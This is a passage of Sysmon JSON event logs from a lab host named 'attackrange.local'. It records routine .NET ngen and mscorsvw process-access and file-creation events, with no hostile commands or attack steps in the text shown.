ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:04.365","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22A8-5F25-0000-00105C371000}","TargetProcessId":"4044","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8116,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:04.412\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22A8-5F25-0000-0010373B1000}\r\nTargetProcessId: 4100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:04.412","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22A8-5F25-0000-0010373B1000}","TargetProcessId":"4100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8117,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:04.412\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22A8-5F25-0000-0010373B1000}\r\nTargetProcessId: 4100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:04.412","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22A8-5F25-0000-0010373B1000}","TargetProcessId":"4100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8118,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:04.428\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22A8-5F25-0000-0010373B1000}\r\nTargetProcessId: 4100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:04.428","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22A8-5F25-0000-0010373B1000}","TargetProcessId":"4100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8119,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:04.631\r\nProcessGuid: {41C8662E-22A8-5F25-0000-0010373B1000}\r\nProcessId: 4100\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1004-0\\System.Web.DataVisualization.Design.dll\r\nCreationUtcTime: 2020-08-01 08:07:04.631","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:04.631","ProcessGuid":"{41C8662E-22A8-5F25-0000-0010373B1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1004-0\\System.Web.DataVisualization.Design.dll","CreationUtcTime":"2020-08-01 08:07:04.631","EventReceivedTime":"2020-08-01 08:07:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8120,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:04.678\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22A8-5F25-0000-0010D73F1000}\r\nTargetProcessId: 3984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:04.678","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22A8-5F25-0000-0010D73F1000}","TargetProcessId":"3984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8121,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:04.678\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22A8-5F25-0000-0010D73F1000}\r\nTargetProcessId: 3984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:04.678","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22A8-5F25-0000-0010D73F1000}","TargetProcessId":"3984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8122,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:04.678\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22A8-5F25-0000-0010D73F1000}\r\nTargetProcessId: 3984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:04.678","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22A8-5F25-0000-0010D73F1000}","TargetProcessId":"3984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8123,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:04.865\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22A8-5F25-0000-00106D451000}\r\nTargetProcessId: 4040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:04.865","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22A8-5F25-0000-00106D451000}","TargetProcessId":"4040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8124,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:04.865\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22A8-5F25-0000-00106D451000}\r\nTargetProcessId: 4040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 